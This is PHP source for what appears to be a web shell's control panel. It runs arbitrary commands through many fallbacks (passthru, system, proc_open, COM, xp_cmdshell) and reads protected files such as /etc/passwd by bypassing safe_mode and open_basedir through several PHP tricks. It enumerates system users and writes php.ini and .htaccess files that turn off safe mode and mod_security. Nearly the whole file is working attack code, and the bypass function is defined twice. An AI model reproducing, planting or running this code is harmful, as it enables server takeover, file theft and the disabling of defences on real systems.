function Exe($command)
{
$exec = $output = '';
$dep[] = array('pipe', 'r');
$dep[] = array('pipe', 'w');
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif (function_exists('shell_exec')) {
$exec = @shell_exec($command);
} elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$exec = winshelL($command);
} elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$exec = srvshelL($command);
} elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$exec = ffishelL($command);
} elseif (extension_loaded('perl')) {
$exec = perlshelL($command);
}
return $exec;
}
function safemodE()
{
global $windows, $t, $hcwd, $et;
$file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file'];
$pr = "\r\n</font><font color=green>Method ";
$po = ")</font><font color=blue>\r\n";
$i = 1;
if (!empty($_REQUEST['read'])) {
echo "<pre>{$pr}{$i}:(ini_restore{$po}";
ini_restore('safe_mode');
ini_restore('open_basedir');
readfile($file);
$i++;
echo "{$pr}{$i}:(include{$po}";
include $file;
$i++;
echo "{$pr}{$i}:(copy{$po}";
$tmp = tempnam('', 'cx');
copy('compress.zlib://' . $file, $tmp);
$fh = fopen($tmp, 'r');
$data = fread($fh, filesize($tmp));
fclose($fh);
echo $data;
$i++;
if (function_exists('mb_send_mail')) {
echo "{$pr}{$i}:(mb_send_mail{$po}";
if (file_exists('/tmp/mb_send_mail')) {
unlink('/tmp/mb_send_mail');
}
mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail');
readfile('/tmp/mb_send_mail');
$i++;
}
if (function_exists('curl_init')) {
echo "{$pr}{$i}:(curl_init [A]{$po}";
$fh = curl_init('file://' . $file . '');
$tmp = curl_exec($fh);
echo $tmp;
$i++;
echo "{$pr}{$i}:(curl_init [B]{$po}";
$i++;
if (strstr($file, DIRECTORY_SEPARATOR)) {
$ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__);
} else {
$ch = curl_init('file://' . $file . "" . __FILE__);
}
var_dump(curl_exec($ch));
}
if (is_writable('.')) {
echo "{$pr}{$i}:(php.ini{$po}";
file_put_contents('php.ini', 'safe_mode = Off');
readfile($file);
unlink('php.ini');
$i++;
}
if (is_object($ws = new COM('WScript.Shell'))) {
echo "{$pr}{$i}:(COM{$po}";
echo $exec = comshelL("type \"{$file}\"", $ws);
$i++;
}
if (checkfunctioN('win_shell_execute')) {
echo "{$pr}{$i}:(win32std{$po}";
echo winshelL("type \"{$file}\"");
$i++;
}
if (checkfunctioN('win32_create_service')) {
echo "{$pr}{$i}:(win32service{$po}";
echo srvshelL("type \"{$file}\"");
$i++;
}
if (function_exists('imap_open')) {
echo "{$pr}{$i}:(imap [A]{$po}";
$str = imap_open('/etc/passwd', '', '');
$list = imap_list($str, $file, '*');
for ($i = 0; $i < count($list); $i++) {
echo $list[$i] . "\n";
}
imap_close($str);
$i++;
echo "{$pr}{$i}:(imap [B]{$po}";
$str = imap_open($file, '', '');
$tmp = imap_body($str, 1);
echo $tmp;
imap_close($str);
$i++;
}
if ($file == '/etc/passwd') {
echo "{$pr}{$i}:(posix{$po}";
for ($uid = 0; $uid < 99999; $uid++) {
$h = posix_getpwuid($uid);
if (!empty($h)) {
foreach ($h as $v) {
echo "{$v}:";
}
}
echo "\r\n";
}
}
echo "\n</pre></font>";
} elseif (!empty($_REQUEST['show'])) {
echo "<pre>{$pr}{$i}:(glob{$po}";
$con = glob("{$file}*");
foreach ($con as $v) {
echo "{$v}\n";
}
$i++;
if (function_exists('imap_open')) {
echo "{$pr}{$i}:(imap{$po}";
$str = imap_open('/etc/passwd', '', '');
$s = explode("|", $file);
if (count($s) > 1) {
$list = imap_list($str, trim($s[0]), trim($s[1]));
} else {
$list = imap_list($str, trim($str[0]), '*');
}
for ($i = 0; $i < count($list); $i++) {
echo "{$list[$i]}\r\n";
}
imap_close($str);
$i++;
}
if (is_object($ws = new COM('WScript.Shell'))) {
echo "{$pr}{$i}:(COM{$po}";
$exec = comshelL("dir \"{$file}\"", $ws);
$exec = str_replace("\t", '', $exec);
echo $exec;
$i++;
}
if (checkfunctioN('win_shell_execute')) {
echo "{$pr}{$i}:(win32std{$po}";
echo winshelL("dir \"{$file}\"");
$i++;
}
if (checkfunctioN('win32_create_service')) {
echo "{$pr}{$i}:(win32service{$po}";
echo srvshelL("dir \"{$file}\"");
$i++;
}
echo "\n</pre></font>";
} elseif (!empty($_REQUEST['sql'])) {
$ta = uniqid('N');
$s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}");
$l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
mysql_select_db($_REQUEST['db'], $l);
echo '<pre><font color=blue>';
foreach ($s as $v) {
$q = mysql_query($v, $l);
while ($d = mysql_fetch_row($q)) {
echo htmlspecialchars($d[0]);
}
}
echo '</pre></font>';
} elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) {
$res = '';
$tb = uniqid('NJ');
$db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']);
mssql_select_db($_REQUEST['dB'], $db);
mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db);
mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db);
$re = mssql_query("select * from {$tb}", $db);
while ($row = mssql_fetch_row($re)) {
$res .= $row[0] . "\r\n";
}
mssql_query("drop table {$tb}", $db);
mssql_close($db);
echo "<center><textarea rows='18' cols='64'>{$res}</textarea></center><br>";
}
$f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd';
$u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'cbfteam';
$p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456';
$d = !empty($_REQUEST['db']) ? htmlspecialchars($_REQUEST['db']) : 'test';
echo "<center>{$t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>{$hcwd}<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>{$et}<br>{$t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='{$u}'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='{$p}'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='{$d}'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>{$hcwd}<input class=buttons type=submit name=sql value='Read'></form>{$et}<br>{$t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";
if (!empty($_REQUEST['serveR'])) {
echo htmlspecialchars($_REQUEST['serveR']);
} else {
echo 'localhost';
}
echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";
if (!empty($_REQUEST['useR'])) {
echo htmlspecialchars($_REQUEST['useR']);
} else {
echo 'sa';
}
echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";
if (!empty($_REQUEST['pasS'])) {
echo htmlspecialchars($_REQUEST['pasS']);
}
echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";
if (!empty($_REQUEST['coM'])) {
echo htmlspecialchars($_REQUEST['coM']);
} else {
echo 'dir c:';
}
echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";
if (isset($_REQUEST['dB'])) {
echo htmlspecialchars($_REQUEST['dB']);
} else {
echo 'master';
}
echo "'> {$hcwd}<input class=buttons type=submit value='Execute'></form>{$et}</center>";
}
function safemodE()
{
global $windows, $hcwd;
$file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file'];
$pr = "\r\n</font><font color=green>Method ";
$po = ")</font><font color=#FA0>\r\n";
$i = 1;
if (!empty($_REQUEST['read'])) {
echo "<pre>{$pr}{$i}:(ini_restore{$po}";
ini_restore('safe_mode');
ini_restore('open_basedir');
readfile($file);
$i++;
if (checkfunctioN("ioncube_read_file")) {
echo "{$pr}{$i}:(ionCube{$po}";
echo ioncube_read_file($file);
$i++;
}
if (checkfunctioN('symlink')) {
echo "{$pr}{$i}:(symlink{$po}";
$lnk = whereistmP() . DIRECTORY_SEPARATOR . uniqid('lnk_');
@symlink($file, $lnk);
@readfile($lnk);
@unlink($lnk);
$i++;
}
echo "{$pr}{$i}:(include{$po}";
include $file;
$i++;
echo "{$pr}{$i}:(copy{$po}";
$tmp = tempnam('', 'cx');
copy('compress.zlib://' . $file, $tmp);
$fh = fopen($tmp, 'r');
$data = fread($fh, filesize($tmp));
fclose($fh);
echo $data;
$i++;
if (checkfunctioN('mb_send_mail')) {
echo "{$pr}{$i}:(mb_send_mail{$po}";
if (file_exists('/tmp/mb_send_mail')) {
unlink('/tmp/mb_send_mail');
}
mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail');
readfile('/tmp/mb_send_mail');
$i++;
}
if (checkfunctioN('curl_init')) {
echo "{$pr}{$i}:(curl_init [A]{$po}";
$fh = curl_init('file://' . $file . '');
$tmp = curl_exec($fh);
echo $tmp;
$i++;
echo "{$pr}{$i}:(curl_init [B]{$po}";
$i++;
if (strstr($file, DIRECTORY_SEPARATOR)) {
$ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__);
} else {
$ch = curl_init('file://' . $file . "" . __FILE__);
}
var_dump(curl_exec($ch));
}
if ($windows) {
echo "{$pr}{$i}:(shell{$po}";
echo shelL("type \"{$file}\"");
$i++;
} else {
echo "{$pr}{$i}:(shell{$po}";
echo shelL("cat {$file}");
$i++;
}
if (checkfunctioN('imap_open')) {
echo "{$pr}{$i}:(imap [A]{$po}";
$str = imap_open('/etc/passwd', '', '');
$list = imap_list($str, $file, '*');
for ($i = 0; $i < count($list); $i++) {
echo $list[$i] . "\n";
}
imap_close($str);
$i++;
echo "{$pr}{$i}:(imap [B]{$po}";
$str = imap_open($file, '', '');
$tmp = imap_body($str, 1);
echo $tmp;
imap_close($str);
$i++;
}
if ($file == '/etc/passwd') {
echo "{$pr}{$i}:(posix{$po}";
for ($uid = 0; $uid < 99999; $uid++) {
$h = posix_getpwuid($uid);
if (!empty($h)) {
foreach ($h as $k => $v) {
echo "{$v}";
if ($k != 'shell') {
echo ":";
}
}
echo "\r\n";
}
}
}
echo "\n</pre></font>";
} elseif (!empty($_REQUEST['show'])) {
echo "<pre>{$pr}{$i}:(glob{$po}";
$con = glob("{$file}*");
foreach ($con as $v) {
echo "{$v}\n";
}
$i++;
if (checkfunctioN('imap_open')) {
echo "{$pr}{$i}:(imap{$po}";
$str = imap_open('/etc/passwd', '', '');
$s = explode("|", $file);
if (count($s) > 1) {
$list = imap_list($str, trim($s[0]), trim($s[1]));
} else {
$list = imap_list($str, trim($str[0]), '*');
}
for ($i = 0; $i < count($list); $i++) {
echo "{$list[$i]}\r\n";
}
imap_close($str);
$i++;
}
if (class_exists('COM')) {
echo "{$pr}{$i}:(COM{$po}";
$ws = new COM('WScript.Shell');
$exec = comshelL("dir \"{$file}\"", $ws);
$exec = str_replace("\t", '', $exec);
echo $exec;
$i++;
}
if (checkfunctioN('win_shell_execute')) {
echo "{$pr}{$i}:(win32std{$po}";
echo winshelL("dir \"{$file}\"");
$i++;
}
if (checkfunctioN('win32_create_service')) {
echo "{$pr}{$i}:(win32service{$po}";
echo srvshelL("dir \"{$file}\"");
}
echo "\n</pre></font>";
} elseif (!empty($_REQUEST['create'])) {
$i = 1;
$dir = dirname(__FILE__) . DIRECTORY_SEPARATOR;
if (is_writable($dir)) {
echo "<pre>{$pr}{$i}:(php.ini{$po}";
file_put_contents($dir . 'php.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off");
echo "\nphp.ini created!\n";
$i++;
echo "{$pr}{$i}:(ini.ini{$po}";
file_put_contents($dir . 'ini.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off");
echo "\nini.ini created!\n";
$i++;
echo "{$pr}{$i}:(.htaccess{$po}";
file_put_contents($dir . '.htaccess', "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckCookieFormat Off\r\nSecFilterNormalizeCookies Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>");
echo "\n.htaccess created!\n";
echo "\nCheck if safe-mode is off.\n</pre></font>";
} else {
echo "Local directory is not writable!";
}
} elseif (!empty($_REQUEST['sql'])) {
$ta = uniqid('N');
$s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}");
$l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
mysql_select_db($_REQUEST['db'], $l);
echo '<pre><font color=#FA0>';
foreach ($s as $v) {
$q = mysql_query($v, $l);
while ($d = mysql_fetch_row($q)) {
echo htmlspecialchars($d[0]);
}
}
echo '</pre></font>';
} elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) {
$res = '';
$tb = uniqid('NJ');
$db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']);
mssql_select_db($_REQUEST['dB'], $db);
mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db);
mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db);
$re = mssql_query("select * from {$tb}", $db);
while ($row = mssql_fetch_row($re)) {
$res .= $row[0] . "\r\n";
}
mssql_query("drop table {$tb}", $db);
mssql_close($db);
echo "<div align=center><textarea rows='18' cols='64'>{$res}</textarea></div><br>";
}
$f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd';
$u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'root';
$p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456';
$d = !empty($_REQUEST['db']) ? htmlspecialchars($_REQUEST['db']) : 'test';
echo '
<form name="client" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Disable safe-mode & mod_sec</label>
</div><div class="fieldwrapper">
<label class="styled">Create config files:</label>
<div class="thefield">
php.ini<br />
ini.ini<br />
.htaccess<br />
</div>
</div>' . $hcwd . '<div class="buttonsdiv">
<input type="submit" name="create" value="Create" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Use PHP Bugs</label>
</div><div class="fieldwrapper">
<label class="styled">File:</label>
<div class="thefield">
<input type="text" name="file" value="' . $f . '" size="30" />
</div>
</div>' . $hcwd . '<div class="buttonsdiv">
<input type="submit" name="read" value="Read File" style="margin-left: 150px;" />
</div>
<div class="buttonsdiv">
<input type="submit" name="show" value="List directory" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client1" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Use MySQL</label>
</div><div class="fieldwrapper">
<label class="styled">File:</label>
<div class="thefield">
<input type="text" name="file" value="' . $f . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" value="' . $u . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pass" value="' . $p . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Database:</label>
<div class="thefield">
<input type="text" name="db" value="' . $d . '" size="30" />
</div>
</div>' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="sql" value="Read" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client2" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">MSSQL Exec</label>
</div><div class="fieldwrapper">
<label class="styled">Server:</label>
<div class="thefield">
<input type="text" name="serveR" value="';
if (!empty($_REQUEST['serveR'])) {
echo htmlspecialchars($_REQUEST['serveR']);
} else {
echo 'localhost';
}
echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="useR" value="';
if (!empty($_REQUEST['useR'])) {
echo htmlspecialchars($_REQUEST['useR']);
} else {
echo 'sa';
}
echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pasS" value="';
if (!empty($_REQUEST['pasS'])) {
echo htmlspecialchars($_REQUEST['pasS']);
}
echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Command:</label>
<div class="thefield">
<input type="text" name="coM" value="';
if (!empty($_REQUEST['coM'])) {
echo htmlspecialchars($_REQUEST['coM']);
} else {
echo 'dir c:';
}
echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Database:</label>
<div class="thefield">
<input type="text" name="dB" value="';
if (!empty($_REQUEST['dB'])) {
echo htmlspecialchars($_REQUEST['dB']);
} else {
echo 'master';
}
echo '" size="30" />
</div>
</div>' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" value="Execute" style="margin-left: 150px;" />
</div>
</form>
';
}